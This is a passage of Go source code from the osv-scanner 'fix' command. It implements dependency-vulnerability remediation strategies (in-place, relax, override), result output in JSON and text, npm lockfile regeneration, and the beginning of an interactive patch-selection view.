func doRelock(ctx context.Context, cl client.ResolutionClient, m manif.Manifest, opts resolution.ResolveOpts, matchFn func(resolution.Vulnerability) bool) tea.Msg {
	res, err := resolution.Resolve(ctx, cl, m, opts)
	if err != nil {
		return doRelockMsg{nil, err}
	}

	if err := cl.WriteCache(m.FilePath); err != nil {
		return doRelockMsg{nil, err}
	}

	res.FilterVulns(matchFn)

	return doRelockMsg{res, nil}
}

// doInitialRelock opens and reads the manifest named in opts, pre-fetches its
// requirements through the client, and then runs doRelock on it.
func doInitialRelock(ctx context.Context, opts osvFixOptions) tea.Msg {
	f, err := depfile.OpenLocalDepFile(opts.Manifest)
	if err != nil {
		return doRelockMsg{err: err}
	}
	defer f.Close()

	m, err := opts.ManifestRW.Read(f)
	if err != nil {
		return doRelockMsg{err: err}
	}

	client.PreFetch(ctx, opts.Client, m.Requirements, m.FilePath)

	return doRelock(ctx, opts.Client, m, opts.ResolveOpts, opts.MatchVuln)
}

// tui.ViewModel for showing non-interactive strings
type infoStringView string

// Update ignores the message and returns the view unchanged.
func (s infoStringView) Update(tea.Msg) (tui.ViewModel, tea.Cmd) { return s, nil }

// View returns the string itself.
func (s infoStringView) View() string { return string(s) }

// Resize does nothing.
func (s infoStringView) Resize(int, int) {}

// emptyInfoView is the info view with no content.
var emptyInfoView = infoStringView("")

// resolutionErrorView renders the resolution errors in errs as a text view,
// one entry per error naming the node being resolved and the requirement that
// failed. It returns emptyInfoView when errs is empty.
func resolutionErrorView(res *resolution.Result, errs []resolution.NodeError) tui.ViewModel {
	if len(errs) == 0 {
		return emptyInfoView
	}

	s := strings.Builder{}
	s.WriteString("The following errors were encountered during resolution which may impact results:\n")
	for _, e := range errs {
		// assumes e.NodeID is a valid index into res.Graph.Nodes - TODO confirm
		node := res.Graph.Nodes[e.NodeID]
		fmt.Fprintf(&s, "Error when resolving %s@%s:\n", node.Version.Name, node.Version.Version)
		req := e.Error.Req
		if strings.Contains(req.Version, ":") {
			// this will be the case with unsupported npm requirements e.g.
// `file:...`, `git+https://...`
			// TODO: don't rely on resolution to propagate these errors
			// No easy access to the `knownAs` field to find which package this corresponds to
			fmt.Fprintf(&s, "\tSkipped resolving unsupported version specification: %s\n", req.Version)
		} else {
			fmt.Fprintf(&s, "\t%v: %s@%s\n", e.Error.Error, req.Name, req.Version)
		}
	}

	return infoStringView(s.String())
}

// writeMsg is a message type carrying only an error value.
type writeMsg struct {
	err error
}

================================================
FILE: cmd/osv-scanner/fix/noninteractive.go
================================================
package fix

import (
	"cmp"
	"context"
	"errors"
	"fmt"
	"maps"
	"slices"

	"deps.dev/util/resolve"
	"deps.dev/util/resolve/dep"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/datasource"
	"github.com/google/osv-scanner/v2/internal/identifiers"
	"github.com/google/osv-scanner/v2/internal/remediation"
	"github.com/google/osv-scanner/v2/internal/resolution"
	"github.com/google/osv-scanner/v2/internal/resolution/client"
	"github.com/google/osv-scanner/v2/internal/resolution/depfile"
	lf "github.com/google/osv-scanner/v2/internal/resolution/lockfile"
	"github.com/google/osv-scanner/v2/internal/resolution/manifest"
	"github.com/google/osv-scanner/v2/internal/resolution/util"
)

// autoInPlace is the non-interactive in-place strategy: it reads the lockfile,
// computes in-place patches, prints the result, and then overwrites the
// lockfile at opts.Lockfile with the chosen patches. The file is rewritten at
// its original path; no backup copy is made in this function.
func autoInPlace(ctx context.Context, opts osvFixOptions, maxUpgrades int) error {
	if !remediation.SupportsInPlace(opts.LockfileRW) {
		return fmt.Errorf("%s strategy is not supported for lockfile", strategyInPlace)
	}

	cmdlogger.Infof("Scanning %s...", opts.Lockfile)
	var outputResult fixOutput
	outputResult.Path = opts.Lockfile
	outputResult.Ecosystem = util.OSVEcosystem[opts.LockfileRW.System()]
	outputResult.Strategy = strategyInPlace

	f, err := depfile.OpenLocalDepFile(opts.Lockfile)
	if err != nil {
		return err
	}
	// The file is closed as soon as it has been read, before the read error is checked.
	g, err := opts.LockfileRW.Read(f)
	f.Close()
	if err != nil {
		return err
	}

	res, err := remediation.ComputeInPlacePatches(ctx, opts.Client, g, opts.Options)
	if err != nil {
		return err
	}

	patches := autoChooseInPlacePatches(res, maxUpgrades, &outputResult)
	// The result is printed before the lockfile is touched; a print failure aborts the rewrite.
	if err := printResult(outputResult, opts); err != nil {
		cmdlogger.Errorf("failed writing output")
		return err
	}

	cmdlogger.Infof("Rewriting %s...", opts.Lockfile)

	return lf.Overwrite(opts.LockfileRW, opts.Lockfile, patches)
}

// returns the top {maxUpgrades} compatible patches, and populates outputResult.
// if maxUpgrades is < 0, do as many patches as possible
//
// Patches are taken in the order given in res.Patches; at most one patch is
// chosen per package version. A negative maxUpgrades never reaches zero by
// decrementing, so it places no limit on the number of patches.
func autoChooseInPlacePatches(res remediation.InPlaceResult, maxUpgrades int, outputResult *fixOutput) []lf.DependencyPatch {
	// Keep track of the VersionKeys we've already patched so we know which patches are incompatible
	seenVKs := make(map[resolve.VersionKey]bool)
	uniqueVulns := make(map[packageOutput]struct{})
	var patches []lf.DependencyPatch
	for _, p := range res.Patches {
		vk := resolve.VersionKey{
			PackageKey: p.Pkg,
			Version:    p.OrigVersion,
		}

		// add each of the resolved vulnKeys to the set of unique vulns
		// NOTE(review): the set is keyed by package name and version only, not by
		// vulnerability ID, so once one vulnerability has been recorded for a package
		// version every further resolved vulnerability for that version is skipped and
		// never appended to outputResult.Vulnerabilities - confirm this is intended,
		// since the reported vulnerability list may then under-count.
		for _, rv := range p.ResolvedVulns {
			// This p shadows the patch p for the rest of the inner loop body.
			p := packageOutput{Name: vk.Name, Version: vk.Version}
			if _, ok := uniqueVulns[p]; ok {
				continue
			}
			uniqueVulns[p] = struct{}{}
			outputResult.Vulnerabilities = append(outputResult.Vulnerabilities, vulnOutput{
				ID:           rv.OSV.GetId(),
				Packages:     []packageOutput{p},
				Unactionable: false,
			})
		}

		// If we still are picking more patches, and we haven't already patched this specific version,
		// then add this patch to our final set of patches and count the vulnerabilities
		if maxUpgrades != 0 && !seenVKs[vk] {
			seenVKs[vk] = true
			patches = append(patches, p.DependencyPatch)
			maxUpgrades--

			vulns := make([]vulnOutput, len(p.ResolvedVulns))
			for i, v := range p.ResolvedVulns {
				vulns[i].ID = v.OSV.GetId()
				vulns[i].Packages = []packageOutput{{Name: p.Pkg.Name, Version: p.OrigVersion}}
				vulns[i].Unactionable = false
			}
			sortVulns(vulns)
			outputResult.Patches = append(outputResult.Patches, patchOutput{
				PackageUpdates: []updatePackageOutput{{Name: p.Pkg.Name, VersionFrom: p.OrigVersion, VersionTo: p.NewVersion, Transitive: true}},
				Fixed:          vulns,
			})
		}
	}

	// Add unactionable vulns to output
	for _, vuln := range res.Unfixable {
		v := makeResultVuln(vuln)
		v.Unactionable = true
		outputResult.Vulnerabilities = append(outputResult.Vulnerabilities, v)
	}
	sortVulns(outputResult.Vulnerabilities)

	return patches
}

// autoRelax is the non-interactive relax strategy: it resolves the manifest,
// computes relaxation patches, prints the result, overwrites the manifest at
// opts.Manifest and, when a lockfile was given, runs an external command to
// regenerate that lockfile.
//
// The manifest is rewritten before the lockfile command runs, so a failed
// regeneration leaves the rewritten manifest in place next to the old lockfile.
func autoRelax(ctx context.Context, opts osvFixOptions, maxUpgrades int) error {
	if !remediation.SupportsRelax(opts.ManifestRW) {
		return fmt.Errorf("%s strategy is not supported for manifest", strategyRelax)
	}

	cmdlogger.Infof("Resolving %s...", opts.Manifest)
	var outputResult fixOutput
	outputResult.Path = opts.Manifest
	outputResult.Ecosystem = util.OSVEcosystem[opts.ManifestRW.System()]
	outputResult.Strategy = strategyRelax

	f, err := depfile.OpenLocalDepFile(opts.Manifest)
	if err != nil {
		return err
	}

	// The file is closed as soon as it has been read, before the read error is checked.
	manif, err := opts.ManifestRW.Read(f)
	f.Close()
	if err != nil {
		return err
	}

	client.PreFetch(ctx, opts.Client, manif.Requirements, manif.FilePath)
	res, err := resolution.Resolve(ctx, opts.Client, manif, opts.ResolveOpts)
	if err != nil {
		return err
	}

	res.FilterVulns(opts.MatchVuln)
	// TODO: count vulnerabilities per unique version as scan action does

	allPatches, err := remediation.ComputeRelaxPatches(ctx, opts.Client, res, opts.Options)
	if err != nil {
		return err
	}

	if opts.NoIntroduce {
		allPatches = removeVulnIntroducingPatches(allPatches)
	}

	populateResultVulns(&outputResult, res, allPatches)

	// A cache write failure is only logged; remediation continues.
	if err := opts.Client.WriteCache(manif.FilePath); err != nil {
		cmdlogger.Warnf("WARNING: failed to write resolution cache: %v", err)
	}

	depPatches := autoChooseRelaxPatches(allPatches, maxUpgrades, &outputResult)
	// The result is printed before any file is touched; a print failure aborts the rewrite.
	if err := printResult(outputResult, opts); err != nil {
		cmdlogger.Errorf("failed writing output")
		return err
	}

	// Nothing to apply: neither the manifest nor the lockfile is modified.
	if len(depPatches) == 0 {
		return nil
	}

	cmdlogger.Infof("Rewriting %s...", opts.Manifest)
	if err := manifest.Overwrite(opts.ManifestRW, opts.Manifest, manifest.Patch{Manifest: &manif, Deps: depPatches}); err != nil {
		return err
	}

	if opts.Lockfile != "" {
		// We only recreate the lockfile if we know a lockfile already exists
		// or we've been given a command to run.
		// NOTE(review): the command is built by regenerateLockfileCmd, which is not
		// visible here. If it is a package-manager install run in the project
		// directory, install-time scripts of the resolved dependencies may execute
		// with the user's privileges - confirm whether script execution is disabled
		// when `fix` is run against an untrusted project.
		cmdlogger.Infof("Shelling out to regenerate lockfile...")
		cmd, err := regenerateLockfileCmd(ctx, opts)
		if err != nil {
			return err
		}
		cmd.Stdout = opts.Stdout
		cmd.Stderr = opts.Stderr
		cmdlogger.Infof("Executing `%s`...", cmd)
		err = cmd.Run()
		if err == nil {
			return nil
		}
		// The error of the first attempt is not logged; a fresh command is built and
		// run once more with one extra argument.
		cmdlogger.Warnf("Install failed. Trying again with `--legacy-peer-deps`...")
		cmd, err = regenerateLockfileCmd(ctx, opts)
		if err != nil {
			return err
		}
		cmd.Args = append(cmd.Args, "--legacy-peer-deps")
		cmd.Stdout = opts.Stdout
		cmd.Stderr = opts.Stderr

		return cmd.Run()
	}

	return nil
}

// returns the top {maxUpgrades} compatible patches, and populates outputResult
// if maxUpgrades is < 0, do as many patches as possible
func autoChooseRelaxPatches(diffs []resolution.Difference, maxUpgrades int, outputResult *fixOutput) []manifest.DependencyPatch {
	var patches []manifest.DependencyPatch
	pkgChanged := make(map[resolve.VersionKey]bool) // dependencies we've already applied a patch to
	for _, diff := range diffs {
		// If we are not picking any more patches, or this patch is incompatible with existing patches, skip adding it to the patch list.
		// A patch is incompatible if any of its changed packages have already been changed by an existing patch.
if maxUpgrades == 0 || slices.ContainsFunc(diff.Deps, func(dp manifest.DependencyPatch) bool { return pkgChanged[resolve.VersionKey{PackageKey: dp.Pkg, Version: dp.OrigRequire}] }) {
			continue
		}
		var p patchOutput
		// Add all individual package patches to the final patch list, and add the vulns this is anticipated to resolve
		for _, dp := range diff.Deps {
			patches = append(patches, dp)
			// Keyed by package and its original requirement string.
			pkgChanged[resolve.VersionKey{PackageKey: dp.Pkg, Version: dp.OrigRequire}] = true
			// Relax patches are always reported as direct (Transitive: false).
			p.PackageUpdates = append(p.PackageUpdates, updatePackageOutput{
				Name:        dp.Pkg.Name,
				VersionFrom: dp.OrigRequire,
				VersionTo:   dp.NewRequire,
				Transitive:  false,
			})
		}
		for _, vuln := range diff.RemovedVulns {
			p.Fixed = append(p.Fixed, makeResultVuln(vuln))
		}
		sortVulns(p.Fixed)
		// Vulnerabilities the patch would add are reported alongside the fixes.
		for _, v := range diff.AddedVulns {
			p.Introduced = append(p.Introduced, makeResultVuln(v))
		}
		sortVulns(p.Introduced)
		outputResult.Patches = append(outputResult.Patches, p)
		// One unit of budget per Difference, regardless of how many Deps it changes.
		maxUpgrades--
	}
	return patches
}

// autoOverride runs the non-interactive override strategy: it resolves the
// manifest, computes candidate override patches, picks up to maxUpgrades
// compatible ones, prints the result and rewrites the manifest.
//
// Unlike autoRelax, no lockfile is regenerated and no external command is run.
// Returns the first error encountered. A failure to write the resolution cache
// is only logged.
func autoOverride(ctx context.Context, opts osvFixOptions, maxUpgrades int) error {
	if !remediation.SupportsOverride(opts.ManifestRW) {
		return errors.New("override strategy is not supported for manifest")
	}
	cmdlogger.Infof("Resolving %s...", opts.Manifest)
	var outputResult fixOutput
	outputResult.Path = opts.Manifest
	outputResult.Ecosystem = util.OSVEcosystem[opts.ManifestRW.System()]
	outputResult.Strategy = strategyOverride
	f, err := depfile.OpenLocalDepFile(opts.Manifest)
	if err != nil {
		return err
	}
	manif, err := opts.ManifestRW.Read(f)
	// The file is closed before the read error is inspected; Close's own error is not checked.
	f.Close()
	if err != nil {
		return err
	}
	if opts.ManifestRW.System() == resolve.Maven {
		// Update Maven registries based on the repositories defined in pom.xml,
		// as well as the repositories merged from parent pom.xml.
		// TODO: add registries defined in settings.xml
		// https://github.com/google/osv-scanner/issues/1269
		//
		// NOTE(review): the registry URLs come from the manifest being analysed.
		// Presumably the client then fetches metadata from them, in which case
		// resolving a project means contacting hosts that the project itself
		// names. Confirm against the client implementation.
		specific, ok := manif.EcosystemSpecific.(manifest.MavenManifestSpecific)
		if ok {
			registries := make([]client.Registry, len(specific.Repositories))
			for i, repo := range specific.Repositories {
				registries[i] = datasource.MavenRegistry{
					URL:              string(repo.URL),
					ID:               string(repo.ID),
					ReleasesEnabled:  repo.Releases.Enabled.Boolean(),
					SnapshotsEnabled: repo.Snapshots.Enabled.Boolean(),
				}
			}
			if err := opts.Client.AddRegistries(registries); err != nil {
				return err
			}
		}
	}
	client.PreFetch(ctx, opts.Client, manif.Requirements, manif.FilePath)
	res, err := resolution.Resolve(ctx, opts.Client, manif, opts.ResolveOpts)
	if err != nil {
		return err
	}
	res.FilterVulns(opts.MatchVuln)
	// TODO: count vulnerabilities per unique version as scan action does
	allPatches, err := remediation.ComputeOverridePatches(ctx, opts.Client, res, opts.Options)
	if err != nil {
		return err
	}
	// With NoIntroduce, any patch that would add a vulnerability is dropped
	// before selection.
	if opts.NoIntroduce {
		allPatches = removeVulnIntroducingPatches(allPatches)
	}
	populateResultVulns(&outputResult, res, allPatches)
	if err := opts.Client.WriteCache(manif.FilePath); err != nil {
		cmdlogger.Warnf("WARNING: failed to write resolution cache: %v", err)
	}
	depPatches := autoChooseOverridePatches(allPatches, maxUpgrades, &outputResult)
	if err := printResult(outputResult, opts); err != nil {
		cmdlogger.Errorf("failed writing output")
		return err
	}
	// Nothing selected: leave the manifest untouched.
	if len(depPatches) == 0 {
		return nil
	}
	cmdlogger.Infof("Rewriting %s...", opts.Manifest)
	if err := manifest.Overwrite(opts.ManifestRW, opts.Manifest, manifest.Patch{Manifest: &manif, Deps: depPatches}); err != nil {
		return err
	}
	return nil
}

// autoChooseOverridePatches selects up to maxUpgrades mutually compatible
// override patches from diffs, in the order given, and records them in
// outputResult.Patches.
//
// maxUpgrades == 0 returns nil without touching outputResult. A negative value
// never reaches 0 when decremented, so every compatible patch is taken.
func autoChooseOverridePatches(diffs []resolution.Difference, maxUpgrades int, outputResult *fixOutput) []manifest.DependencyPatch {
	if maxUpgrades == 0 {
		return nil
	}
	var patches []manifest.DependencyPatch
	pkgChanged := make(map[resolve.PackageKey]bool) // dependencies we've already applied a patch to
	fixedVulns := make(map[string]struct{})         // vulns that have already been fixed by a patch
	for _, diff := range diffs {
		// If this patch is incompatible with existing patches, skip adding it to the patch list.
		// A patch is incompatible if any of its changed packages have already been changed by an existing patch.
		if slices.ContainsFunc(diff.Deps, func(dp manifest.DependencyPatch) bool { return pkgChanged[dp.Pkg] }) {
			continue
		}
		// A patch is also incompatible if any fixed vulnerability has already been fixed by another patch.
		// This would happen if updating the version of one package has a side effect of also updating or removing one of its vulnerable dependencies.
		// e.g. We have {foo@1 -> bar@1}, and two possible patches [foo@3, bar@2].
		// Patching foo@3 makes {foo@3 -> bar@3}, which also fixes the vulnerability in bar.
		// Applying both patches would force {foo@3 -> bar@2}, which is less desirable.
		if slices.ContainsFunc(diff.RemovedVulns, func(rv resolution.Vulnerability) bool { _, ok := fixedVulns[rv.OSV.GetId()]; return ok }) {
			continue
		}
		var p patchOutput
		// Add all individual package patches to the final patch list, and track the vulns this is anticipated to fix.
for _, dp := range diff.Deps {
			patches = append(patches, dp)
			pkgChanged[dp.Pkg] = true
			// Assume the package is transitive until it is found among the
			// manifest's own requirements below.
			pkgUpdate := updatePackageOutput{
				Name:        dp.Pkg.Name,
				VersionFrom: dp.OrigResolved,
				VersionTo:   dp.NewRequire,
				Transitive:  true,
			}
			// Check if this is a direct dependency
			// (a requirement for the same package that does not carry the
			// MavenDependencyOrigin attribute).
			for _, req := range diff.Original.Manifest.Requirements {
				if req.PackageKey == dp.Pkg && !req.Type.HasAttr(dep.MavenDependencyOrigin) {
					pkgUpdate.Transitive = false
					break
				}
			}
			p.PackageUpdates = append(p.PackageUpdates, pkgUpdate)
		}
		for _, vuln := range diff.RemovedVulns {
			// Remember the ID so that later patches fixing the same vuln are skipped.
			fixedVulns[vuln.OSV.GetId()] = struct{}{}
			p.Fixed = append(p.Fixed, makeResultVuln(vuln))
		}
		sortVulns(p.Fixed)
		for _, vuln := range diff.AddedVulns {
			p.Introduced = append(p.Introduced, makeResultVuln(vuln))
		}
		sortVulns(p.Introduced)
		outputResult.Patches = append(outputResult.Patches, p)
		// One unit of budget per Difference; stop as soon as it is used up.
		maxUpgrades--
		if maxUpgrades == 0 {
			break
		}
	}
	return patches
}

// sortVulns sorts vulns in place by ID, using identifiers.IDSortFunc as the ordering.
func sortVulns(vulns []vulnOutput) {
	slices.SortFunc(vulns, func(a, b vulnOutput) int { return identifiers.IDSortFunc(a.ID, b.ID) })
}

// makeResultVuln converts a resolution.Vulnerability into its output form.
//
// Packages holds the distinct name/version pairs taken from
// sg.Nodes[sg.Dependency].Version of each subgraph, sorted by name and then by
// version so the result does not depend on map iteration order. Unactionable is
// left at its zero value; callers set it.
func makeResultVuln(vuln resolution.Vulnerability) vulnOutput {
	v := vulnOutput{
		ID: vuln.OSV.GetId(),
	}
	// Used as a set to de-duplicate packages that appear in several subgraphs.
	affected := make(map[packageOutput]struct{})
	for _, sg := range vuln.Subgraphs {
		vk := sg.Nodes[sg.Dependency].Version
		affected[packageOutput{Name: vk.Name, Version: vk.Version}] = struct{}{}
	}
	v.Packages = slices.AppendSeq(make([]packageOutput, 0, len(affected)), maps.Keys(affected))
	slices.SortFunc(v.Packages, func(a, b packageOutput) int {
		if c := cmp.Compare(a.Name, b.Name); c != 0 {
			return c
		}
		return cmp.Compare(a.Version, b.Version)
	})
	return v
}

// populateResultVulns fills outputResult.Errors and outputResult.Vulnerabilities
// from a resolution result.
//
// Every vulnerability in res.Vulns starts as Unactionable and is flipped to
// actionable if any patch in allPatches lists its ID in RemovedVulns. Entries are
// keyed by ID, so a repeated ID in res.Vulns keeps only the last one seen.
func populateResultVulns(outputResult *fixOutput, res *resolution.Result, allPatches []resolution.Difference) {
	// Resolution errors
	for _, err := range res.Errors() {
		node := res.Graph.Nodes[err.NodeID]
		outputResult.Errors = append(outputResult.Errors, errorOutput{
			Package: packageOutput{
				Name:    node.Version.Name,
				Version: node.Version.Version,
			},
			Requirement: packageOutput{
				Name:    err.Error.Req.Name,
				Version: err.Error.Req.Version,
			},
			Error: err.Error.Error,
		})
	}
	// Vulnerabilities
	vulns := make(map[string]vulnOutput, len(res.Vulns))
	// This slice is replaced by the slices.Collect result below; the allocation
	// here is never read.
	outputResult.Vulnerabilities = make([]vulnOutput, len(res.Vulns))
	for _, vuln := range res.Vulns {
		v := makeResultVuln(vuln)
		v.Unactionable = true
		vulns[v.ID] = v
	}
	// Determine if vulnerabilities are actionable
	for _, p := range allPatches {
		for _, vuln := range p.RemovedVulns {
			// vulnOutput is stored by value, so the modified copy is written back.
			if v, ok := vulns[vuln.OSV.GetId()]; ok {
				v.Unactionable = false
				vulns[vuln.OSV.GetId()] = v
			}
		}
	}
	// Map iteration order is random; sortVulns makes the output deterministic.
	outputResult.Vulnerabilities = slices.Collect(maps.Values(vulns))
	sortVulns(outputResult.Vulnerabilities)
}

// removeVulnIntroducingPatches drops every patch whose AddedVulns is non-empty.
// slices.DeleteFunc works in place, so the caller's backing array is modified;
// use the returned slice, not the argument, afterwards.
func removeVulnIntroducingPatches(patches []resolution.Difference) []resolution.Difference {
	return slices.DeleteFunc(patches, func(diff resolution.Difference) bool { return len(diff.AddedVulns) > 0 })
}

================================================
FILE: cmd/osv-scanner/fix/output.go
================================================
package fix

import (
	"encoding/json"
	"io"
	"slices"
	"strings"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

// fixOutput is a description of changes made by guided remediation to a manifest/lockfile.
// It is the value that outputJSON encodes, so the struct tags below define the
// JSON field names of the machine-readable report.
type fixOutput struct {
	Path            string                 `json:"path"`             // path to the manifest/lockfile.
	Ecosystem       osvconstants.Ecosystem `json:"ecosystem"`        // the OSV ecosystem of the file (npm, Maven)
	Strategy        strategy               `json:"strategy"`         // the remediation strategy that was used.
	Vulnerabilities []vulnOutput           `json:"vulnerabilities"`  // vulns detected in the initial manifest/lockfile.
	Patches         []patchOutput          `json:"patches"`          // list of dependency patches that were applied.
	Errors          []errorOutput          `json:"errors,omitempty"` // non-fatal errors encountered in initial resolution.
}

// vulnOutput represents a vulnerability that was found in a project.
type vulnOutput struct {
	ID string `json:"id"` // the OSV ID of the vulnerability.
Packages []packageOutput `json:"packages"` // the list of packages in the dependency graph this vuln affects.
	Unactionable bool `json:"unactionable,omitempty"` // true if no fix patch available, or if constraints would prevent one.
}

// patchOutput represents an isolated patch to one or more dependencies that fixes one or more vulns.
type patchOutput struct {
	PackageUpdates []updatePackageOutput `json:"packageUpdates"`       // dependencies that were updated.
	Fixed          []vulnOutput          `json:"fixed"`                // vulns fixed by this patch.
	Introduced     []vulnOutput          `json:"introduced,omitempty"` // vulns introduced by this patch.
}

// packageOutput represents a package that was found in a project.
// It has only comparable fields and is used as a map key elsewhere in this package.
type packageOutput struct {
	Name    string `json:"name"`    // name of the dependency.
	Version string `json:"version"` // version of the dependency in the graph.
}

// updatePackageOutput represents a package that was updated by a patch.
type updatePackageOutput struct {
	Name        string `json:"name"`        // name of dependency being updated.
	VersionFrom string `json:"versionFrom"` // version of the dependency before the patch.
	VersionTo   string `json:"versionTo"`   // version of the dependency after the patch.
	Transitive  bool   `json:"transitive"`  // false if this package is a direct dependency, true if indirect.
}

// errorOutput represents an error encountered during the initial resolution of the dependency graph.
type errorOutput struct {
	Package     packageOutput `json:"package"`     // the package that caused the error.
	Requirement packageOutput `json:"requirement"` // the requirement of the package that errored.
	Error       string        `json:"error"`       // the error string.
	// e.g.
	// errorOutput{
	//   Package: packageOutput{"foo", "1.2.3"},
	//   Requirement: packageOutput{"bar", ">2.0.0"},
	//   Error: "could not find a version that satisfies requirement >2.0.0 for package bar",
	// }
}

// printResult writes outputResult as JSON to opts.Stdout when opts.OutputJSON is
// set, and as text otherwise. It returns whatever the chosen writer returns.
func printResult(outputResult fixOutput, opts osvFixOptions) error {
	if opts.OutputJSON {
		return outputJSON(opts.Stdout, outputResult)
	}
	return outputText(opts.Stdout, outputResult)
}

// outputText reports out as log lines through cmdlogger. The io.Writer argument
// is ignored, so the text report goes wherever cmdlogger is configured to write.
// It always returns nil.
//
// Several lines use a fixed "KEY: value[,value...]" shape (OVERRIDE-PACKAGE,
// UPGRADED-PACKAGE, FIXED-VULN-IDS, REMAINING-VULNS, UNFIXABLE-VULNS).
// NOTE(review): package names, versions and error strings are formatted with %s
// and no escaping. They originate from the analysed manifest and from
// resolution, so anything that parses these lines should not assume the values
// are free of commas or control characters. Confirm what validation happens upstream.
func outputText(_ io.Writer, out fixOutput) error {
	if len(out.Errors) > 0 {
		cmdlogger.Warnf("WARNING: encountered %d errors during dependency resolution:", len(out.Errors))
		for _, err := range out.Errors {
			cmdlogger.Errorf("Error when resolving %s@%s:", err.Package.Name, err.Package.Version)
			if strings.Contains(err.Requirement.Version, ":") {
				// this will be the case with unsupported npm requirements e.g. `file:...`, `git+https://...`
				// TODO: don't rely on resolution to propagate these errors
				// No easy access to the `knownAs` field to find which package this corresponds to
				cmdlogger.Errorf("\tSkipped resolving unsupported version specification: %s", err.Requirement.Version)
			} else {
				cmdlogger.Errorf("\t%v: %s@%s", err.Error, err.Requirement.Name, err.Requirement.Version)
			}
		}
	}
	nVulns := len(out.Vulnerabilities)
	cmdlogger.Infof("Found %d vulnerabilities matching the filter", nVulns)
	if len(out.Patches) == 0 {
		// With no patches, every vulnerability is reported as both remaining and
		// unfixable, without consulting the Unactionable flags.
		cmdlogger.Infof("No dependency patches are possible")
		cmdlogger.Infof("REMAINING-VULNS: %d", nVulns)
		cmdlogger.Infof("UNFIXABLE-VULNS: %d", nVulns)
		return nil
	}
	changedDeps := 0
	// IDs are collected per patch without de-duplication.
	// NOTE(review): if two patches list the same ID, len(fixedVulns) counts it
	// twice and REMAINING-VULNS is too low. Confirm that this cannot happen.
	var fixedVulns []string
	for _, patch := range out.Patches {
		changedDeps += len(patch.PackageUpdates)
		for _, v := range patch.Fixed {
			fixedVulns = append(fixedVulns, v.ID)
		}
	}
	if out.Strategy == strategyOverride {
		cmdlogger.Infof("Can fix %d/%d matching vulnerabilities by overriding %d dependencies", len(fixedVulns), nVulns, changedDeps)
		for _, patch := range out.Patches {
			for _, pkg := range patch.PackageUpdates {
				cmdlogger.Infof("OVERRIDE-PACKAGE: %s,%s", pkg.Name, pkg.VersionTo)
			}
		}
	} else {
cmdlogger.Infof("Can fix %d/%d matching vulnerabilities by changing %d dependencies", len(fixedVulns), nVulns, changedDeps)
		for _, patch := range out.Patches {
			for _, pkg := range patch.PackageUpdates {
				cmdlogger.Infof("UPGRADED-PACKAGE: %s,%s,%s", pkg.Name, pkg.VersionFrom, pkg.VersionTo)
			}
		}
	}
	// Sorted so the comma-separated ID list is stable between runs.
	slices.Sort(fixedVulns)
	cmdlogger.Infof("FIXED-VULN-IDS: %s", strings.Join(fixedVulns, ","))
	cmdlogger.Infof("REMAINING-VULNS: %d", nVulns-len(fixedVulns))
	// Unfixable means flagged Unactionable in the vulnerability list.
	nUnfixable := 0
	for _, v := range out.Vulnerabilities {
		if v.Unactionable {
			nUnfixable++
		}
	}
	cmdlogger.Infof("UNFIXABLE-VULNS: %d", nUnfixable)
	return nil
}

// outputJSON writes out to w as indented JSON and returns the encoder's error.
// json.Encoder escapes string contents, so unlike the text report this form does
// not depend on names and versions being free of separators.
func outputJSON(w io.Writer, out fixOutput) error {
	encoder := json.NewEncoder(w)
	encoder.SetIndent("", " ")
	return encoder.Encode(out)
}

================================================
FILE: cmd/osv-scanner/fix/regen_lockfile.go
================================================
package fix

import (
	"context"
	"os"
	"os/exec"
	"path/filepath"
)

// regenerateLockfileCmd prepares, but does not run, the npm command that
// rebuilds the lockfile next to opts.Manifest.
//
// Side effects happen before the command is returned: package-lock.json and
// node_modules in the manifest's directory are deleted. os.RemoveAll reports no
// error for a path that does not exist. Nothing here restores them if the
// returned command later fails.
//
// Returns the command with its working directory set to the manifest's
// directory, or the first deletion error.
func regenerateLockfileCmd(ctx context.Context, opts osvFixOptions) (*exec.Cmd, error) {
	// TODO: this is npm-specific and hacky
	// delete existing package-lock & node_modules directory to force npm to do a clean install
	dir := filepath.Dir(opts.Manifest)
	if err := os.RemoveAll(filepath.Join(dir, "package-lock.json")); err != nil {
		return nil, err
	}
	if err := os.RemoveAll(filepath.Join(dir, "node_modules")); err != nil {
		return nil, err
	}
	// TODO: need to also remove node_modules/ in workspace packages
	//
	// The arguments are fixed strings and no shell is involved, so nothing from
	// the manifest is interpolated into the command line.
	//   --package-lock-only: only the lockfile is updated; packages are not
	//     installed into node_modules.
	//   --ignore-scripts: npm does not run scripts from package.json files, so
	//     regenerating the lockfile does not execute the project's or its
	//     dependencies' install hooks.
	// "npm" is resolved through PATH when the command is created.
	// NOTE(review): npm still runs in the project directory and reads any
	// project-level .npmrc there, so registry and similar settings can come from
	// the project being fixed. Confirm whether that is acceptable for untrusted
	// checkouts.
	c := exec.CommandContext(ctx, "npm", "install", "--package-lock-only", "--ignore-scripts")
	c.Dir = dir
	return c, nil
}

================================================
FILE: cmd/osv-scanner/fix/state-choose-in-place-patches.go
================================================
package fix

import (
	"fmt"
	"slices"

	"charm.land/bubbles/v2/key"
	"charm.land/bubbles/v2/table"
	tea "charm.land/bubbletea/v2"
	"charm.land/lipgloss/v2"
	"github.com/google/osv-scanner/v2/internal/tui"
)

// stateChooseInPlacePatches is the interactive state in which individual
// in-place patches are selected or deselected.
type stateChooseInPlacePatches struct {
	stateInPlace
*stateInPlaceResult table table.Model // in-place table to render patchIdx []int // for each flattened patch, its index into unflattened patches vulnsInfos []tui.ViewModel // vulns info views corresponding to each flattened patch focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused viewWidth int // width for rendering (same as model.mainViewWidth) } func (st *stateChooseInPlacePatches) Init(m model) tea.Cmd { // pre-computation of flattened patches and vulns for idx, p := range m.inPlaceResult.Patches { for i := range p.ResolvedVulns { st.patchIdx = append(st.patchIdx, idx) st.vulnsInfos = append(st.vulnsInfos, tui.NewVulnInfo(&p.ResolvedVulns[i])) } } // grab the table out of the InPlaceInfo, so it looks consistent // TODO: Re-use this in a less hacky way st.table = tui.NewInPlaceInfo(*m.inPlaceResult).Model // insert the select/deselect all row, and a placeholder row for the 'done' line r := st.table.Rows() r = slices.Insert(r, 0, table.Row{"", "", ""}) r = append(r, table.Row{"", "", ""}) st.table.SetRows(r) st.updateTableRows(m) st.Resize(m.mainViewWidth, m.mainViewHeight) 